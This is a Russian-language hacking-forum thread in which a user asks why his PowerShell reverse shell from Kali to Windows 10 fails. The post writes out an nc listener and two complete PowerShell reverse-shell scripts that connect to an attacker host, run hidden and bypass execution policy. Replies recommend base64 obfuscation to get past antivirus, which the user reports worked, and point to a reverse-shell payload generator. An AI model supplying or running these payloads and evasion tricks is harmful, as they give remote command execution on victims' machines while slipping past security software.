Проблема Простой реверс шелл

hitman20

Green Team
09.05.2022
152
26
Привет всем.
Помогите реализовать простой реверс шелл с Kali на windows 10 .
Сам пробовал , но что то не получается , не пойму в чем дело.
На Kali открыл открыл порт рандомный на прослушку:
Код:
nc -lvnp 5555
На винде от имени админа открваю powershell и пишу там:
Код:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("IP_Kali",5555);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
или в таком формате
Код:
powershell -NoExit -Command "& {
$client = New-Object System.Net.Sockets.TcpClient('IP_Kali', 5555);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
    $sendback = (Invoke-Expression $data 2>&1 | Out-String);
    $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> ';
    $sendbyte = ([Text.Encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte, 0, $sendbyte.Length);
    $stream.Flush();
}
$client.Close();
Read-Host 'Press Enter to exit'
}"

P.S. там пишу IP адрес kali естественно. Так же приостановил стандартный антивирус на винде.

После нажатии Enter почему то закрывается окошка просто. Пробовал создать файл ps1, и через отдельное окно его выполнить, но тогда выдает ошибка синтаксиса, типа все неверно, целый лист ошибок.

Может есть рабочий скрипт у кого то? Не сложную, простую, для демонстрации просто.
 
ссылка не открвается.. только заголовок и каркас сайта :( видимо тоже под санкциями или цензурой.
А что там можно делать? обфуксировать код под base64 ?
 
да, base64 получилось )) А собственно в чем была проблема? все же открытый код где то гасится?
Классный проект между прочим, спасибо.
 
Последнее редактирование:
да, base64 получилось )) А собственно в чем была проблема? все же открытый код где то гасится?
Классный проект между прочим, спасибо.
АВ блочить может, вот еще тебе инструмент - GitHub - t3l3machus/hoaxshell: A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

1768164031832.webp
 
  • Нравится
Реакции: hitman20
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab